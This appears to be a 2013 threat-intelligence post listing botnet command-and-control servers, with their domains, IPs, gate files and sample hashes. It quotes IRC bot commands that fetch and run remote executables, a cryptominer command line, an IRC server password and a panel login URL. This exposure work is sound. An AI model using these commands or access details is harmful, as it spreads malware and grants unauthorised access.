Resolved kankarmz.ru to 37.221.170.35 Server: kankarmz.ru Gate file: /Duf67/H8938_827.php Alternate domains (both are currently unregistered): u023sjasj.netiodijsakj.net This is one of only three or so betabots that I have seen rename the gate file from order.php to something less obvious. I guess that might be a bit too advanced for the average HF skid. Hosting infos:Read more...
xvident.pw (andromeda http botnet hosted by maxhosting.ru)
Resolved xvident.pw to 192.162.100.211 Server: xvident.pw Gate file: gate.php There is a another domain pointed to the same IP which is also hosting a andromeda panel. Server: plesto.pw Gate file: gate.php Hosting infos: http://whois.domaintools.com/192.162.100.211 Related md5s (search on malwr.com to download samples) Andromeda 57e8423ba1a1d8816ba5d078fd9f64df
yt4cpa.us (Andromeda http botnet hosted by worldstream.nl)
Resoloved yt4cpa.us to 217.23.11.122 Server: yt4cpa.us Gate file: /gate.php Downloaded by this betabot phpinfo here: http://yt4cpa.us/test.php Hosting infos: http://whois.domaintools.com/217.23.11.122 Related md5s (search on malwr.com to download samples) Andromeda b887cdbc60cdbaecd6702405b57dc0a1
spambox.su (snk aspermod irc botnet hosted by Cityline Ltd)
Resolved spambox.su to 95.215.70.66 Server: spambox.su Port: 5050 Channel: #b600 Now talking on #b600 Topic for #b600 is: .j #sendingTopic for #b600 set by x (Sat Aug 10 05:38:20 2013) Hosting infos: http://whois.domaintools.com/95.215.70.66 Related md5s (search on malwr.com to download samples): Asper mod b1abf1aaa62115c53184e34190aa114e
thebankslife.no-ip.biz (Athena irc botnet hosted by shellxnet.com)
Resolved thebankslife.no-ip.biz to 72.20.28.232 Server: thebankslife.no-ip.biz Port: 6667 Channel Users Topic #sexlyfe 2 [+nt] #Syncrude 78 [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5 #bankslife 35 [+nt] .gtfo Channel: #Syncrude Now talking on #Syncrude Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5 Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013) Bitcoin mining info: macromedia.exe” -a scrypt -oRead more...
bitcoinglobalbanking.com (Betabot http botnet hosted by leaseweb.com)
Resolved bitcoinglobalbanking.com to 82.192.92.5 Server: bitcoinglobalbanking.com Gate file: /b/order.php Alternate domain: bitcointradingdepot.com This botnet wasn’t actually mining bitcoins when I checked it. I’m very surprised. Hosting infos: http://whois.domaintools.com/82.192.92.5 Related md5s (search on malwr.com to download the samples): Beta bot bbfdbd53810751401b720641687a6116 EDIT: It finally started bitcoin mining Mining infos: macromedia.exe” -a scrypt -o http://mine.pool-x.eu:8080 -u jc2244.crRead more...
smokelessbooter.tk (Betabot http botnet hosted by ecatel.net)
Resolved smokelessbooter.tk to 94.102.51.123 Server: smokelessbooter.tk Gate file: /bronk/order.php Alternate domains: watchonlinecams.comssh-products.comfudfiles.comtheprofitnet.com1337hackers.comcash-networks.com We have a real HF hecker here folks. I can see a Java “driveby” site, shitty crypter site, shitty CPA network site and a shitty hackforums clone site just from the domain names. Looks like he’s running a shitty hosting company as well:Read more...
bigtoys.pw (Betabot http botnet hosted by namecheap.com)
Resolved bigtoys.pw to 198.187.28.72 Server: bigtoys.pw Gate file: /b/order.php Alternative domain: smalltoys.pw I wonder who this could belong to? Name Server:NS2.HOSTING-MARVID.ME Name Server:NS1.HOSTING-MARVID.ME An idiot, obviously Related md5s (search on malwr.com to download the samples): Betabot: 2662af32e5d58d471bd16dc3202db284 Hosting infos: http://whois.domaintools.com/198.187.28.72
zbraaadanstfesse.org (Pony loader hosted by chicagovps.net)
Resolved zbraaadanstfesse.org to 172.245.5.137 Server: zbraaadanstfesse.org Gate file: /p/stats.php This is currently being downloaded by this citadel net. This is also a backup domain for a betabot, and is the domain currently used by it. Betabot login: hxxp://zbraaadanstfesse.org/~.poto/login.php Related md5s (Search on malwr.com for samples): 7ec71449228f4209b9df59bb68ec3a5f Hosting infos: http://whois.domaintools.com/172.245.5.137
x.fullhdizle.co (Irc botnet hosted by hostforweb.net)
Resolved x.fullhdizle.co to 216.246.77.143 Server: x.fullhdizle.co Port: 1989 Server password: r00t33 Channel: #xxx Channel password: r00t33 Topic for #xxx is: !open hxxp://www.fullhdizle.coTopic for #xxx set by Coder at Wed Jun 26 14:02:37 2013 Related md5s (search on malwr.com to download the samples): 8cbdc21108b468ecd95644f18b83324d Hosting infos: http://whois.domaintools.com/216.246.77.143